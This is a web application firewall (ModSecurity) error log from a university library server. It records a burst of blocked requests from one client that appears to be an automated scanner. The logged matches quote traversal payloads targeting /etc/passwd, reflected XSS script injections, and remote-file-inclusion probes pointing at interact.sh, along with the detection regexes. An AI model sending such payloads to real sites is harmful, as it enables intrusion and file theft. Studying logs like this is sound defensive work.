[Tue Aug 29 11:52:45.533541 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:extra. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:extra: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/mj_wwwusr"] [unique_id "ZO15ncCo-f0AAAnTlUgAAAAA"]
[Tue Aug 29 11:52:45.575752 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/openwin.php"] [unique_id "ZO15ncCo-f0AAAnd3LoAAAAI"]
[Tue Aug 29 11:52:46.837704 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:redirect_to: /asdf\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/demo/api/logout"] [unique_id "ZO15nsCo-f0AAAmQ-24AAAAb"]
[Tue Aug 29 11:52:47.646622 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/user/login/"] [unique_id "ZO15n8Co-f0AAAoT7QAAAAAD"]
[Tue Aug 29 11:52:47.667560 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../..//../../ found within ARGS:dir: ../../..//../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15n8Co-f0AAAoT7QEAAAAD"]
[Tue Aug 29 11:52:48.834849 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/user/logout"] [unique_id "ZO15oMCo-f0AAAoO54sAAAAK"]
[Tue Aug 29 11:52:49.551889 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:m. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:m: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/anti-plagiarism/js.php"] [unique_id "ZO15ocCo-f0AAAoGFbkAAAAE"]
[Tue Aug 29 11:52:49.586723 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:f: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/learn/cubemail/filemanagement.php"] [unique_id "ZO15ocCo-f0AAAoQ3NgAAAAN"]
[Tue Aug 29 11:52:49.590377 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:u. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:u: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/tweb/ft.php"] [unique_id "ZO15ocCo-f0AAAoT7Q4AAAAD"]
[Tue Aug 29 11:52:50.804367 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/user/register"] [unique_id "ZO15osCo-f0AAAfWOScAAAAL"]
[Tue Aug 29 11:52:51.859837 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1'<script found within ARGS:id: 1'<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO15o8Co-f0AAAoLfL8AAAAG"]
[Tue Aug 29 11:52:52.266069 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/user/resend-activation"] [unique_id "ZO15pMCo-f0AAAnd3N4AAAAI"]
[Tue Aug 29 11:52:52.669304 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:loginMode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:loginMode: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilib.unla.ac.id"] [uri "/MicroStrategyLibrary/auth/ui/loginPage"] [unique_id "ZO15pMCo-f0AAAnd3OQAAAAI"]
[Tue Aug 29 11:52:52.676934 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:mes: </script>\\x22><script>alert(123)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php"] [unique_id "ZO15pMCo-f0AAAnTlXAAAAAA"]
[Tue Aug 29 11:52:52.881484 2023] [:error] [pid 2587] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://? found within ARGS:redirect_to: http://?1</sCripT><sCripT>alert(document.domain)</sCripT>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15pMCo-f0AAAobT-YAAAAQ"]
[Tue Aug 29 11:52:55.768939 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15p8Co-f0AAAoLfNsAAAAG"]
[Tue Aug 29 11:52:55.933097 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:")',10000000);alert(1337);setTimeout('alert(". [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22)',10000000);alert(1337);setTimeout('alert(\\x22: \\x22)',10000000);alert(1337);setTimeout('alert(\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/www/delivery/afr.php"] [unique_id "ZO15p8Co-f0AAAoesJMAAAAV"]
[Tue Aug 29 11:52:55.956620 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:rsd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:rsd: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO15p8Co-f0AAAoW7LQAAAAJ"]
[Tue Aug 29 11:52:57.732906 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:data[performredirect]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:data[performredirect]: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO15qcCo-f0AAAoVqrIAAAAH"]
[Tue Aug 29 11:52:59.223726 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:file: '>\\x22<svg/onload=confirm('test')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/diffResult.php"] [unique_id "ZO15q8Co-f0AAAlUlzEAAAA0"]
[Tue Aug 29 11:53:00.564177 2023] [:error] [pid 2598] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22()&%< found within ARGS:language: language'\\x22()&%<yes></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/clansphere/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15rMCo-f0AAAomlz4AAAAf"]
[Tue Aug 29 11:53:00.693559 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:passformname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:passformname: \\x22><script>alert(1514407383);</script><script>/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/plugins/vkeyboard/vkeyboard.php"] [unique_id "ZO15rMCo-f0AAAoLfPEAAAAG"]
[Tue Aug 29 11:53:01.568067 2023] [:error] [pid 2601] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/awstats/awredir.pl"] [unique_id "ZO15rcCo-f0AAAopQ0AAAAAi"]
[Tue Aug 29 11:53:01.896558 2023] [:error] [pid 2604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:pagination_wp_facethumb. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:pagination_wp_facethumb: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO15rcCo-f0AAAosCucAAAAm"]
[Tue Aug 29 11:53:02.742614 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:is2sim. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:is2sim: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15rsCo-f0AAAoW7MMAAAAJ"]
[Tue Aug 29 11:53:02.816029 2023] [:error] [pid 2606] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/awstats/awredir.pl"] [unique_id "ZO15rsCo-f0AAAouCx0AAAAo"]
[Tue Aug 29 11:53:03.952415 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15r8Co-f0AAAoAkwAAAAAC"]
[Tue Aug 29 11:53:04.871236 2023] [:error] [pid 2593] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0IIxPe0GnIO9Ehzy5hFS4kkT)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15sMCo-f0AAAohZ54AAAAZ"]
[Tue Aug 29 11:53:04.914205 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh?a=https://interact.sh found within TX:1: interact.sh?a=https://interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAhoHWAAAAAl"]
[Tue Aug 29 11:53:06.102778 2023] [:error] [pid 2598] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15ssCo-f0AAAoml1AAAAAf"]
